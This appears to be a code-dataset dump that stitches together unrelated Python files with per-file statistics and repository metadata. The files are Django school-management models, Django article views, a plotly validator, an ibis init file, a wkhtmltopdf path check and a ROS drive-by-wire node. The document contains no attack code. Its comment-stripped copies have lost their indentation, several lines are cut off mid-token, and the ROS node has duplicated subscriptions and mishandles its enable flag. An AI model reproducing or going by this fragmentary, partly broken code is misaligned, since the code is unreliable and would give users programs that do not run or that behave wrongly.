    """A student, linked one-to-one to both a Profile and an auth User."""
    profile = models.OneToOneField(Profile, null=True, on_delete=models.SET_NULL)
    user = models.OneToOneField(User, null=True, on_delete=models.SET_NULL)
    def __str__(self):
        return f'Student: {self.user.get_full_name()}'
class Teacher(models.Model):
    """A teacher, linked one-to-one to both a Profile and an auth User."""
    profile = models.OneToOneField(Profile, null=True, on_delete=models.SET_NULL)
    user = models.OneToOneField(User, null=True, on_delete=models.SET_NULL, related_name='teacher')
    def __str__(self):
        return f'Teacher: {self.user.get_full_name()}'
# --------------- Course, Classroom, Lesson Plan and Department's Model----------------------
class Course(models.Model):
    """A course offering; a Classroom is auto-created for it by the
    post_save receiver ``create_classroom_object`` below."""
    course_number = models.CharField(max_length=20,default='12345678')
    abbreviated_title = models.CharField(max_length=150,default='')
    course_title = models.CharField(max_length=250,default='') #,unique=True)
    maximum_credit = models.CharField(max_length=10,default='')
    semester = models.CharField(max_length=50,default='')
    year = models.CharField(max_length=4,default='')
    teacher_name = models.CharField(max_length=50,default='')
    description = models.CharField(max_length=450,default='')
    # Note: when related_name is set on a ForeignKey, the default _set
    # reverse accessor is not available.
    is_archive = models.BooleanField(default=False)
    department = models.ForeignKey('Department',blank=True, null=True, on_delete = models.SET_NULL, related_name='belong_in_department')
    teacher = models.ForeignKey('Teacher',blank=True, null=True, on_delete = models.SET_NULL, related_name='course_by_teacher')
    create_date = models.DateField(auto_now_add=True , blank=True,null=True,)
    # A Course is bound to its teacher; a Classroom is created on save and
    # more rooms can be added later.
class Lesson_plan(models.Model):
    """A weekly lesson plan for a course (one row per week)."""
    course_title = models.CharField(max_length=50,default='')
    teacher_idx = models.CharField(max_length=10,default='')
    week_number = models.CharField(max_length=10,default='')
    agenda = models.CharField(max_length=450,default='Agenda Goes Here')
    monday_date = models.DateField(blank=True, null=True)
    tuesday_date = models.DateField(blank=True, null=True)
    wednesday_date = models.DateField(blank=True, null=True)
    thursday_date = models.DateField(blank=True, null=True)
    friday_date= models.DateField(blank=True, null=True)
    # NOTE(review): the single-letter defaults below look like placeholders;
    # confirm whether they should be '' instead.
    monday_assignment = models.CharField(max_length=400,default='a')
    tuesday_assignment= models.CharField(max_length=400,default='s')
    wednesday_assignment= models.CharField(max_length=400,default='d')
    thursday_assignment= models.CharField(max_length=400,default='f')
    friday_assignment= models.CharField(max_length=400,default='g')
    weekend_assignment = models.CharField(max_length=300,default='h')
    teacher = models.ForeignKey('Teacher',blank=True, null=True, on_delete = models.SET_NULL)
    course = models.ForeignKey('Course',blank=True, null=True, on_delete = models.SET_NULL)
    last_modifield = models.DateTimeField(auto_now=True, blank=True,null=True,)
    create_date = models.DateField(auto_now_add=True, blank=True,null=True,)
    def __str__(self):
        return 'Lesson plan for '+self.course_title +' Teacher: '+ str(self.teacher)
class Classroom(models.Model):
    """A scheduled section of a Course with its enrolled students."""
    course_title = models.CharField(max_length=50,default='')
    course_number = models.CharField(max_length=20,default='')
    teacher_name = models.CharField(max_length=50,default='')
    teacher_idx = models.CharField(max_length=10,default='')
    room_number = models.CharField(max_length=10,default='TBA')
    time = models.TimeField(blank=True,null=True)
    description = models.CharField(max_length=300,default='TBA')
    # Use a for statement to get values from the many-to-many fields.
    # Course = models.ManyToManyField(Course, blank=True)
    is_archive = models.BooleanField(default=False)
    semester = models.CharField(max_length=50,default='')
    year = models.CharField(max_length=4,default='')
    teacher = models.ForeignKey('Teacher',blank=True, null=True, on_delete = models.SET_NULL, related_name='classroom_by_teacher')
    course = models.ForeignKey('Course',blank=True, null=True, on_delete = models.SET_NULL, related_name='course_in_classroom')
    student = models.ManyToManyField(Student, blank=True)
    def __str__(self):
        return 'Course: ' + self.course_title +' Room #: '+self.room_number
@receiver(post_save, sender=Course)
def create_classroom_object(sender, instance, created, **kwargs):
    """post_save hook: create the initial Classroom for a new Course."""
    if created:
        classroom = Classroom.objects.create(course_title=instance.course_title,course_id=instance.id, teacher_name=instance.teacher_name,
            course=instance,teacher=instance.teacher,semester=instance.semester,year=instance.year)
# To find the Classroom:
#   teacher = Teacher.objects.filter(user=request.user)
#   course = Course.objects.filter(teacher_set=teacher, name='Course_name')
#   classroom = Classroom.objects.filter(teacher=teacher).filter(Course=course)
class Department(models.Model):
    """An academic department grouping teachers and students."""
    description = models.CharField(max_length=450,default='Department Description')
    name = models.CharField(max_length=75,default='', unique=True)
    teacher = models.ManyToManyField(Teacher,blank=True)
    student = models.ManyToManyField(Student,blank=True)
    def __str__(self):
        return f'LC High School {self.name} department.'
| 51.268456 | 138 | 0.728629 | from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
elete = models.SET_NULL)
street_address = models.CharField(max_length=200, blank=True)
city = models.CharField(max_length=100, blank=True)
state = models.CharField(max_length=100, blank=True)
zip_code = models.CharField(max_length=20, blank=True)
phone_number = models.CharField(max_length=20, blank=True)
emergency_contact = models.CharField(max_length=20, blank=True)
relationship = models.CharField(max_length=100, blank=True)
middle_name = models.CharField(max_length=50, blank=True)
birth_date = models.DateField(null=True, blank=True)
school_id = models.CharField(max_length=15,null=True, blank = True, default=0)
is_student = models.BooleanField('Student', default=False)
is_teacher = models.BooleanField('Teacher', default=False)
about = models.TextField(max_length=300, blank=True)
hobby = models.TextField(max_length=100, blank=True)
favorite_food = models.TextField(max_length=100, blank=True)
favorite_subject = models.TextField(max_length=100, blank=True)
def __str__(self):
if self.user == None:
return 'User deleted - ' + str(self.school_id)
else:
return self.user.get_full_name()
@receiver(post_save, sender=User)
def create_profile_object(sender, instance, created, **kwargs):
if created:
profile = Profile.objects.create(user=instance)
class Student(models.Model):
profile = models.OneToOneField(Profile, null=True, on_delete = models.SET_NULL)
user = models.OneToOneField(User, null=True, on_delete = models.SET_NULL)
def __str__(self):
return 'Student: ' + str(self.user.get_full_name())
class Teacher(models.Model):
profile = models.OneToOneField(Profile,null=True, on_delete = models.SET_NULL)
user = models.OneToOneField(User, null=True, on_delete = models.SET_NULL, related_name='teacher')
def __str__(self):
return 'Teacher: ' + str(self.user.get_full_name())
class Course(models.Model):
course_number = models.CharField(max_length=20,default='12345678')
abbreviated_title = models.CharField(max_length=150,default='')
course_title = models.CharField(max_length=250,default='') #,unique=True)
maximum_credit = models.CharField(max_length=10,default='')
semester = models.CharField(max_length=50,default='')
year = models.CharField(max_length=4,default='')
teacher_name = models.CharField(max_length=50,default='')
description = models.CharField(max_length=450,default='')
#Alert If related name is use in ForeignKey, _set cannot be use!
is_archive = models.BooleanField(default=False)
department = models.ForeignKey('Department',blank=True, null=True, on_delete = models.SET_NULL, related_name='belong_in_department')
teacher = models.ForeignKey('Teacher',blank=True, null=True, on_delete = models.SET_NULL, related_name='course_by_teacher')
create_date = models.DateField(auto_now_add=True , blank=True,null=True,)
# A Course is bound to the teacher and create a classroom upon creation. More room can be added later
class Lesson_plan(models.Model):
course_title = models.CharField(max_length=50,default='')
teacher_idx = models.CharField(max_length=10,default='')
week_number = models.CharField(max_length=10,default='')
agenda = models.CharField(max_length=450,default='Agenda Goes Here')
monday_date = models.DateField(blank=True, null=True)
tuesday_date = models.DateField(blank=True, null=True)
wednesday_date = models.DateField(blank=True, null=True)
thursday_date = models.DateField(blank=True, null=True)
friday_date= models.DateField(blank=True, null=True)
monday_assignment = models.CharField(max_length=400,default='a')
tuesday_assignment= models.CharField(max_length=400,default='s')
wednesday_assignment= models.CharField(max_length=400,default='d')
thursday_assignment= models.CharField(max_length=400,default='f')
friday_assignment= models.CharField(max_length=400,default='g')
weekend_assignment = models.CharField(max_length=300,default='h')
teacher = models.ForeignKey('Teacher',blank=True, null=True, on_delete = models.SET_NULL)
course = models.ForeignKey('Course',blank=True, null=True, on_delete = models.SET_NULL)
last_modifield = models.DateTimeField(auto_now=True, blank=True,null=True,)
create_date = models.DateField(auto_now_add=True, blank=True,null=True,)
def __str__(self):
return 'Lesson plan for '+self.course_title +' Teacher: '+ str(self.teacher)
class Classroom(models.Model):
course_title = models.CharField(max_length=50,default='')
course_number = models.CharField(max_length=20,default='')
teacher_name = models.CharField(max_length=50,default='')
teacher_idx = models.CharField(max_length=10,default='')
room_number = models.CharField(max_length=10,default='TBA')
time = models.TimeField(blank=True,null=True)
description = models.CharField(max_length=300,default='TBA')
# Use for statement to get value
# Course = models.ManyToManyField(Course, blank=True)
is_archive = models.BooleanField(default=False)
semester = models.CharField(max_length=50,default='')
year = models.CharField(max_length=4,default='')
teacher = models.ForeignKey('Teacher',blank=True, null=True, on_delete = models.SET_NULL, related_name='classroom_by_teacher')
course = models.ForeignKey('Course',blank=True, null=True, on_delete = models.SET_NULL, related_name='course_in_classroom')
student = models.ManyToManyField(Student, blank=True)
def __str__(self):
return 'Course: ' + self.course_title +' Room
@receiver(post_save, sender=Course)
def create_classroom_object(sender, instance, created, **kwargs):
if created:
classroom = Classroom.objects.create(course_title=instance.course_title,course_id=instance.id, teacher_name=instance.teacher_name,
course=instance,teacher=instance.teacher,semester=instance.semester,year=instance.year)
# To Find the Classroom:
# teacher = Teacher.objects.filter(user=request.user)
# Course = Course.objects.filter(teacher_set=teacher, name ='Course_name')
# classroom = Classroom.objects.filter(teacher=teacher).filter(Course=Course)
class Department(models.Model):
description = models.CharField(max_length=450,default='Department Description')
name = models.CharField(max_length=75,default='', unique=True)
# Course = models.ManyToManyField('Course',blank=True)
teacher = models.ManyToManyField(Teacher,blank=True)
student = models.ManyToManyField(Student,blank=True)
def __str__(self):
return 'LC High School ' + self.name + ' department.'
| true | true |
f70ffb6cc9871e9b47e543f54c1311f5835fc889 | 476 | py | Python | plotly/validators/scattergeo/marker/colorbar/_y.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | [
"MIT"
] | 2 | 2020-03-24T11:41:14.000Z | 2021-01-14T07:59:43.000Z | plotly/validators/scattergeo/marker/colorbar/_y.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | [
"MIT"
] | null | null | null | plotly/validators/scattergeo/marker/colorbar/_y.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | [
"MIT"
] | 4 | 2019-06-03T14:49:12.000Z | 2022-01-06T01:05:12.000Z | import _plotly_utils.basevalidators
class YValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self,
plotly_name='y',
parent_name='scattergeo.marker.colorbar',
**kwargs
):
super(YValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='calc',
max=3,
min=-2,
role='style',
**kwargs
)
| 22.666667 | 63 | 0.556723 | import _plotly_utils.basevalidators
class YValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self,
plotly_name='y',
parent_name='scattergeo.marker.colorbar',
**kwargs
):
super(YValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='calc',
max=3,
min=-2,
role='style',
**kwargs
)
| true | true |
f70ffe3f4ef711992da1362f8030fc7607809690 | 791 | py | Python | ibis/backends/pandas/execution/__init__.py | rtpsw/ibis | d7318fdf87121cd8fadbcf0369a2b217aab3053a | [
"Apache-2.0"
] | 1 | 2022-03-22T10:39:37.000Z | 2022-03-22T10:39:37.000Z | ibis/backends/pandas/execution/__init__.py | marlenezw/ibis | 14b9baf3e1021e8698e7f0ae3c0ae5747543431c | [
"Apache-2.0"
] | null | null | null | ibis/backends/pandas/execution/__init__.py | marlenezw/ibis | 14b9baf3e1021e8698e7f0ae3c0ae5747543431c | [
"Apache-2.0"
] | null | null | null | from ibis.backends.pandas.execution.arrays import * # noqa: F401,F403
from ibis.backends.pandas.execution.decimal import * # noqa: F401,F403
from ibis.backends.pandas.execution.generic import * # noqa: F401,F403
from ibis.backends.pandas.execution.join import * # noqa: F401,F403
from ibis.backends.pandas.execution.maps import * # noqa: F401,F403
from ibis.backends.pandas.execution.selection import * # noqa: F401,F403
from ibis.backends.pandas.execution.strings import * # noqa: F401,F403
from ibis.backends.pandas.execution.structs import * # noqa: F401,F403
from ibis.backends.pandas.execution.temporal import * # noqa: F401,F403
from ibis.backends.pandas.execution.timecontext import * # noqa: F401,F403
from ibis.backends.pandas.execution.window import * # noqa: F401,F403
| 65.916667 | 75 | 0.777497 | from ibis.backends.pandas.execution.arrays import *
from ibis.backends.pandas.execution.decimal import *
from ibis.backends.pandas.execution.generic import *
from ibis.backends.pandas.execution.join import *
from ibis.backends.pandas.execution.maps import *
from ibis.backends.pandas.execution.selection import *
from ibis.backends.pandas.execution.strings import *
from ibis.backends.pandas.execution.structs import *
from ibis.backends.pandas.execution.temporal import *
from ibis.backends.pandas.execution.timecontext import *
from ibis.backends.pandas.execution.window import *
| true | true |
f70ffe665af27588bbe9a0130f4ef97d24df0153 | 961 | py | Python | enex2notion/cli_wkhtmltopdf.py | starplanet/enex2notion | 3bd97112e8234b477a3d53c5461ce7a3ac55f7aa | [
"MIT"
] | 49 | 2021-12-12T04:13:24.000Z | 2022-03-31T12:58:57.000Z | enex2notion/cli_wkhtmltopdf.py | starplanet/enex2notion | 3bd97112e8234b477a3d53c5461ce7a3ac55f7aa | [
"MIT"
] | 11 | 2021-12-03T10:49:54.000Z | 2022-03-29T20:00:30.000Z | enex2notion/cli_wkhtmltopdf.py | starplanet/enex2notion | 3bd97112e8234b477a3d53c5461ce7a3ac55f7aa | [
"MIT"
] | 3 | 2022-02-04T13:25:21.000Z | 2022-03-07T17:54:36.000Z | import logging
import os
import platform
import shutil
import sys
from pathlib import Path
logger = logging.getLogger(__name__)
def ensure_wkhtmltopdf():  # pragma: no cover
    """Exit the process with an error unless the wkhtmltopdf binary is reachable.

    On Windows, also tries the registry-recorded install location and, if
    found, appends it to PATH for the rest of the process.
    """
    if shutil.which("wkhtmltopdf") is None:
        if platform.system() == "Windows":
            wkhtmltopdf_path = _find_wkhtmltopdf_path()
            if wkhtmltopdf_path and wkhtmltopdf_path.exists():
                logger.debug(f"Found wkhtmltopdf at {wkhtmltopdf_path}")
                # Make the binary discoverable by later shutil.which/subprocess calls.
                os.environ["PATH"] += os.pathsep + str(wkhtmltopdf_path.parent)
                return
        logger.error("You need to install wkhtmltopdf to use --mode-webclips=PDF")
        sys.exit(1)
def _find_wkhtmltopdf_path():  # pragma: no cover
    """Return the wkhtmltopdf install path from the Windows registry, or None."""
    import winreg  # noqa: WPS433  # Windows-only module; imported lazily.
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\wkhtmltopdf") as key:
            return Path(winreg.QueryValueEx(key, "PdfPath")[0])
    except FileNotFoundError:
        return None
| 30.03125 | 87 | 0.667014 | import logging
import os
import platform
import shutil
import sys
from pathlib import Path
logger = logging.getLogger(__name__)
def ensure_wkhtmltopdf():
if shutil.which("wkhtmltopdf") is None:
if platform.system() == "Windows":
wkhtmltopdf_path = _find_wkhtmltopdf_path()
if wkhtmltopdf_path and wkhtmltopdf_path.exists():
logger.debug(f"Found wkhtmltopdf at {wkhtmltopdf_path}")
os.environ["PATH"] += os.pathsep + str(wkhtmltopdf_path.parent)
return
logger.error("You need to install wkhtmltopdf to use --mode-webclips=PDF")
sys.exit(1)
def _find_wkhtmltopdf_path():
import winreg
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\wkhtmltopdf") as key:
return Path(winreg.QueryValueEx(key, "PdfPath")[0])
except FileNotFoundError:
return None
| true | true |
f70ffe907544adc81b183974aedfca98b72ac20d | 2,936 | py | Python | forumdemo/article/views.py | lamdba0602/forumdemo | 82c6223d6b6d7fb3bac049e342d3048a5117a2b7 | [
"Apache-2.0"
] | null | null | null | forumdemo/article/views.py | lamdba0602/forumdemo | 82c6223d6b6d7fb3bac049e342d3048a5117a2b7 | [
"Apache-2.0"
] | null | null | null | forumdemo/article/views.py | lamdba0602/forumdemo | 82c6223d6b6d7fb3bac049e342d3048a5117a2b7 | [
"Apache-2.0"
] | null | null | null | from django.shortcuts import redirect
from django.shortcuts import render
from django.core.paginator import Paginator
from django.contrib.auth.decorators import login_required
from article.forms import ArticleForm
from article.models import Article
from block.models import Block
from comment.models import Comment
def article_list(request, block_id):
    """Render one page of the visible (status=0) articles of a block."""
    articles_per_page = 1
    requested_page = int(request.GET.get("page_no", "1"))
    block = Block.objects.get(id=int(block_id))
    visible_articles = Article.objects.filter(block=block, status=0).order_by("-id")
    articles, pagination_data = paginate_queryset(
        visible_articles, requested_page, articles_per_page)
    context = {
        "articles": articles,
        "b": block,
        "pagination_data": pagination_data,
    }
    return render(request, "article_list.html", context)
def paginate_queryset(objs, page_no, cnt_per_page=10, half_show_length=5):
    """Slice ``objs`` into pages and describe the pagination widget.

    Returns a tuple ``(object_list, pagination_data)`` where
    ``pagination_data`` carries the clamped page number, the window of page
    links centred on it, and previous/next link state.
    """
    paginator = Paginator(objs, cnt_per_page)
    # Clamp the requested page into the valid [1, num_pages] range.
    page_no = min(page_no, paginator.num_pages)
    page_no = max(page_no, 1)
    # Window of at most 2 * half_show_length + 1 page links around page_no.
    first_link = max(page_no - half_show_length, 1)
    last_link = min(page_no + half_show_length, paginator.num_pages)
    page_links = list(range(first_link, last_link + 1))
    previous_link = first_link - 1
    next_link = last_link + 1
    pagination_data = {
        "page_cnt": paginator.num_pages,
        "page_no": page_no,
        "page_links": page_links,
        "previous_link": previous_link,
        "next_link": next_link,
        "has_previous": previous_link > 0,
        "has_next": next_link <= paginator.num_pages,
    }
    return paginator.page(page_no).object_list, pagination_data
@login_required
def article_create(request, block_id):
    """GET: show the article creation form; POST: validate and persist.

    On a valid POST the new article is attached to the block and the
    current user, then the client is redirected to the block's list page.
    """
    block_id = int(block_id)
    block = Block.objects.get(id=block_id)
    if request.method == "GET":
        return render(request, "article_create.html", {"b": block})
    form = ArticleForm(request.POST)
    if not form.is_valid():
        # Re-display the form with validation errors attached.
        return render(request, "article_create.html", {"b": block, "form": form})
    article = form.save(commit=False)
    article.owner = request.user
    article.block = block
    article.status = 0
    article.save()
    return redirect("/article/list/%s" % block_id)
def article_detail(request, article_id):
    """Render a single article together with a paginated comment list."""
    requested_page = int(request.GET.get("page_no", "1"))
    article = Article.objects.get(id=int(article_id))
    comment_qs = Comment.objects.filter(article=article).order_by("-id")
    # Two comments per page.
    comments, pagination_data = paginate_queryset(comment_qs, requested_page, 2)
    context = {
        "article": article,
        "comments": comments,
        "pagination_data": pagination_data,
    }
    return render(request, "article_detail.html", context)
| 39.146667 | 97 | 0.628065 | from django.shortcuts import redirect
from django.shortcuts import render
from django.core.paginator import Paginator
from django.contrib.auth.decorators import login_required
from article.forms import ArticleForm
from article.models import Article
from block.models import Block
from comment.models import Comment
def article_list(request, block_id):
    """Render one page of the visible (status=0) articles of a block."""
    # NOTE(review): one article per page looks like a debugging value.
    ARTICLE_CNT_1PAGE = 1
    page_no = int(request.GET.get("page_no", "1"))
    block_id = int(block_id)
    block = Block.objects.get(id=block_id)
    articles_objs = Article.objects.filter(block=block, status=0).order_by("-id")
    page_articles, pagination_data = paginate_queryset(articles_objs, page_no, ARTICLE_CNT_1PAGE)
    return render(request, "article_list.html", {"articles": page_articles, "b": block,
                                                 "pagination_data": pagination_data})
def paginate_queryset(objs, page_no, cnt_per_page=10, half_show_length=5):
    """Paginate ``objs`` and build the data driving the pagination widget.

    ``page_no`` is clamped into ``[1, num_pages]``; ``half_show_length``
    controls how many page links appear on each side of the current page.
    Returns ``(object_list, pagination_data)``.
    """
    p = Paginator(objs, cnt_per_page)
    # Clamp the requested page number into the valid range.
    if page_no > p.num_pages:
        page_no = p.num_pages
    if page_no <= 0:
        page_no = 1
    # Window of page links centred on the current page.
    page_links = [i for i in range(page_no - half_show_length, page_no + half_show_length + 1)
                  if i > 0 and i <= p.num_pages]
    page = p.page(page_no)
    previous_link = page_links[0] - 1
    next_link = page_links[-1] + 1
    pagination_data = {"page_cnt": p.num_pages,
                       "page_no": page_no,
                       "page_links": page_links,
                       "previous_link": previous_link,
                       "next_link": next_link,
                       "has_previous": previous_link > 0,
                       "has_next": next_link <= p.num_pages}
    return (page.object_list, pagination_data)
@login_required
def article_create(request, block_id):
    """GET: render the creation form; POST: validate and save the article."""
    block_id = int(block_id)
    block = Block.objects.get(id=block_id)
    if request.method == "GET":
        return render(request, "article_create.html", {"b": block})
    else:
        form = ArticleForm(request.POST)
        if form.is_valid():
            article = form.save(commit=False)
            # Fill in the fields that are not part of the submitted form.
            article.owner = request.user
            article.block = block
            article.status = 0
            article.save()
            return redirect("/article/list/%s" % block_id)
        else:
            # Re-display the form with validation errors attached.
            return render(request, "article_create.html", {"b": block, "form": form})
def article_detail(request, article_id):
    """Render one article plus a paginated (2 per page) comment list."""
    page_no = int(request.GET.get("page_no", "1"))
    article_id = int(article_id)
    article = Article.objects.get(id=article_id)
    comments = Comment.objects.filter(article=article).order_by("-id")
    page_comments, pagination_data = paginate_queryset(comments, page_no, 2)
    return render(request, "article_detail.html", {"article": article,
                                                   "comments": page_comments,
                                                   "pagination_data": pagination_data})
| true | true |
f70ffef3c196a246295ef81a2cfd74f59b7eae71 | 7,088 | py | Python | ros/src/twist_controller/dbw_node.py | russell13192/CarND-Capstone | 1c182de5fb71f021f33518fe54e5ba27748a424d | [
"MIT"
] | 1 | 2019-08-19T20:36:45.000Z | 2019-08-19T20:36:45.000Z | ros/src/twist_controller/dbw_node.py | russell13192/CarND-Capstone | 1c182de5fb71f021f33518fe54e5ba27748a424d | [
"MIT"
] | null | null | null | ros/src/twist_controller/dbw_node.py | russell13192/CarND-Capstone | 1c182de5fb71f021f33518fe54e5ba27748a424d | [
"MIT"
] | 3 | 2019-08-19T20:40:33.000Z | 2019-09-22T18:56:50.000Z | #!/usr/bin/env python
# import cte_calculator
from geometry_msgs.msg import PoseStamped
import rospy
from std_msgs.msg import Bool
from styx_msgs.msg import Lane
from dbw_mkz_msgs.msg import ThrottleCmd, SteeringCmd, BrakeCmd, SteeringReport
from geometry_msgs.msg import TwistStamped
import math
from twist_controller import Controller
'''
You can build this node only after you have built (or partially built) the `waypoint_updater` node.
You will subscribe to `/twist_cmd` message which provides the proposed linear and angular velocities.
You can subscribe to any other message that you find important or refer to the document for list
of messages subscribed to by the reference implementation of this node.
One thing to keep in mind while building this node and the `twist_controller` class is the status
of `dbw_enabled`. While in the simulator, its enabled all the time, in the real car, that will
not be the case. This may cause your PID controller to accumulate error because the car could
temporarily be driven by a human instead of your controller.
We have provided two launch files with this node. Vehicle specific values (like vehicle_mass,
wheel_base) etc should not be altered in tbhese files.
We have also provided some reference implementations for PID controller and other utility classes.
You are free to use them or build your own.
Once you have the proposed throttle, brake, and steer values, publish it on the various publishers
that we have created in the `__init__` function.
'''
class DBWNode(object):
    """Drive-by-wire ROS node.

    Subscribes to the target twist ("/twist_cmd"), the measured velocity
    and the drive-by-wire status, feeds them to a ``Controller`` and
    publishes throttle, brake and steering commands at 50 Hz.  Commands
    are only published while drive-by-wire is engaged, so a safety driver
    can take over without the PID controller accumulating error.
    """

    def __init__(self):
        rospy.init_node('dbw_node')

        vehicle_mass = rospy.get_param('~vehicle_mass', 1736.35)
        fuel_capacity = rospy.get_param('~fuel_capacity', 13.5)
        brake_deadband = rospy.get_param('~brake_deadband', .1)
        decel_limit = rospy.get_param('~decel_limit', -5)
        accel_limit = rospy.get_param('~accel_limit', 1.)
        wheel_radius = rospy.get_param('~wheel_radius', 0.2413)
        wheel_base = rospy.get_param('~wheel_base', 2.8498)
        steer_ratio = rospy.get_param('~steer_ratio', 14.8)
        max_lat_accel = rospy.get_param('~max_lat_accel', 3.)
        max_steer_angle = rospy.get_param('~max_steer_angle', 8.)

        self.steer_pub = rospy.Publisher('/vehicle/steering_cmd',
                                         SteeringCmd, queue_size=1)
        self.throttle_pub = rospy.Publisher('/vehicle/throttle_cmd',
                                            ThrottleCmd, queue_size=1)
        self.brake_pub = rospy.Publisher('/vehicle/brake_cmd',
                                         BrakeCmd, queue_size=1)

        self.controller = Controller(vehicle_mass=vehicle_mass,
                                     fuel_capacity=fuel_capacity,
                                     brake_deadband=brake_deadband,
                                     decel_limit=decel_limit,
                                     accel_limit=accel_limit,
                                     wheel_radius=wheel_radius,
                                     wheel_base=wheel_base,
                                     steer_ratio=steer_ratio,
                                     max_lat_accel=max_lat_accel,
                                     max_steer_angle=max_steer_angle)

        # Initialise all state BEFORE registering subscribers: rospy
        # callbacks run on their own threads and previously could fire
        # while the attributes they (and loop()) touch did not exist yet,
        # or have their values clobbered back to None by __init__.
        self.current_vel = None
        self.curr_ang_vel = None
        self.dbw_enabled = None
        self.linear_vel = None
        self.angular_vel = None
        self.final_waypoints = None
        self.current_pose = None
        self.throttle = self.steering = self.brake = 0

        # Exactly one subscription per topic (the original registered
        # "/twist_cmd" and "/vehicle/dbw_enabled" twice, and also listened
        # on the non-standard "/current_vel" topic).
        self.twist_sub = rospy.Subscriber(
            '/twist_cmd', TwistStamped, self.twist_cb, queue_size=1)
        self.velocity_sub = rospy.Subscriber(
            '/current_velocity', TwistStamped, self.velocity_cb, queue_size=1)
        self.dbw_sub = rospy.Subscriber(
            '/vehicle/dbw_enabled', Bool, self.dbw_enabled_cb, queue_size=1)
        self.final_wp_sub = rospy.Subscriber(
            'final_waypoints', Lane, self.final_waypoints_cb, queue_size=1)
        self.pose_sub = rospy.Subscriber(
            '/current_pose', PoseStamped, self.current_pose_cb, queue_size=1)

        self.loop()

    def loop(self):
        """Run the 50 Hz control loop until the node is shut down."""
        rate = rospy.Rate(50)  # 50Hz
        while not rospy.is_shutdown():
            # Only run the controller once every required input has been
            # received at least once.
            if not None in (self.current_vel, self.linear_vel,
                            self.angular_vel):
                self.throttle, self.brake, self.steering = \
                    self.controller.control(self.current_vel,
                                            self.dbw_enabled,
                                            self.linear_vel,
                                            self.angular_vel)
            # Publish only while drive-by-wire is engaged.
            if self.dbw_enabled:
                self.publish(self.throttle, self.brake, self.steering)
            rate.sleep()

    def dbw_enabled_cb(self, msg):
        """Store the drive-by-wire engagement flag.

        The boolean payload is extracted because a ``std_msgs/Bool``
        message object is always truthy and would defeat the
        ``if self.dbw_enabled`` check in ``loop()``.
        """
        self.dbw_enabled = msg.data

    def twist_cb(self, msg):
        """Record the proposed linear/angular velocities from "/twist_cmd"."""
        self.linear_vel = msg.twist.linear.x
        self.angular_vel = msg.twist.angular.z

    def velocity_cb(self, msg):
        """Record the measured forward velocity from "/current_velocity"."""
        self.current_vel = msg.twist.linear.x

    def publish(self, throttle, brake, steer):
        """Publish one set of throttle, brake and steering commands."""
        tcmd = ThrottleCmd()
        tcmd.enable = True
        tcmd.pedal_cmd_type = ThrottleCmd.CMD_PERCENT
        tcmd.pedal_cmd = throttle
        self.throttle_pub.publish(tcmd)

        scmd = SteeringCmd()
        scmd.enable = True
        scmd.steering_wheel_angle_cmd = steer
        self.steer_pub.publish(scmd)

        bcmd = BrakeCmd()
        bcmd.enable = True
        bcmd.pedal_cmd_type = BrakeCmd.CMD_TORQUE
        bcmd.pedal_cmd = brake
        self.brake_pub.publish(bcmd)

    def current_msg_cb(self, message):
        """Record the measured forward velocity (legacy "/current_vel")."""
        self.current_vel = message.twist.linear.x

    def final_waypoints_cb(self, message):
        """Cache the most recent list of final waypoints."""
        self.final_waypoints = message.waypoints

    def current_pose_cb(self, message):
        """Cache the most recent vehicle pose."""
        self.current_pose = message
if __name__ == '__main__':
    # Constructing the node enters DBWNode.loop(), which blocks until
    # rospy shutdown.
    DBWNode()
from geometry_msgs.msg import PoseStamped
import rospy
from std_msgs.msg import Bool
from styx_msgs.msg import Lane
from dbw_mkz_msgs.msg import ThrottleCmd, SteeringCmd, BrakeCmd, SteeringReport
from geometry_msgs.msg import TwistStamped
import math
from twist_controller import Controller
class DBWNode(object):
    """Drive-by-wire node: runs a 50 Hz loop turning target twist commands
    into throttle, brake and steering commands.

    NOTE(review): "/twist_cmd" and "/vehicle/dbw_enabled" are each
    subscribed twice below, and ``dbw_enabled_cb`` stores the whole Bool
    message (always truthy) rather than its ``.data`` payload -- worth
    confirming and fixing.
    """
    def __init__(self):
        rospy.init_node('dbw_node')
        vehicle_mass = rospy.get_param('~vehicle_mass', 1736.35)
        fuel_capacity = rospy.get_param('~fuel_capacity', 13.5)
        brake_deadband = rospy.get_param('~brake_deadband', .1)
        decel_limit = rospy.get_param('~decel_limit', -5)
        accel_limit = rospy.get_param('~accel_limit', 1.)
        wheel_radius = rospy.get_param('~wheel_radius', 0.2413)
        wheel_base = rospy.get_param('~wheel_base', 2.8498)
        steer_ratio = rospy.get_param('~steer_ratio', 14.8)
        max_lat_accel = rospy.get_param('~max_lat_accel', 3.)
        max_steer_angle = rospy.get_param('~max_steer_angle', 8.)
        self.steer_pub = rospy.Publisher('/vehicle/steering_cmd',
                                         SteeringCmd, queue_size=1)
        self.throttle_pub = rospy.Publisher('/vehicle/throttle_cmd',
                                            ThrottleCmd, queue_size=1)
        self.brake_pub = rospy.Publisher('/vehicle/brake_cmd',
                                         BrakeCmd, queue_size=1)
        self.twist_sub = rospy.Subscriber('/twist_cmd', TwistStamped, self.twist_cb, queue_size=1)
        self.velocity_sub = rospy.Subscriber('/current_vel', TwistStamped, self.current_msg_cb, queue_size=1)
        self.dbw_sub = rospy.Subscriber('/vehicle/dbw_enabled', Bool, self.dbw_enabled_cb, queue_size=1)
        self.final_wp_sub = rospy.Subscriber('final_waypoints', Lane, self.final_waypoints_cb, queue_size=1)
        self.pose_sub = rospy.Subscriber('/current_pose', PoseStamped, self.current_pose_cb, queue_size=1)
        self.controller = Controller(vehicle_mass=vehicle_mass,
                                     fuel_capacity = fuel_capacity,
                                     brake_deadband = brake_deadband,
                                     decel_limit = decel_limit,
                                     accel_limit = accel_limit,
                                     wheel_radius = wheel_radius,
                                     wheel_base = wheel_base,
                                     steer_ratio = steer_ratio,
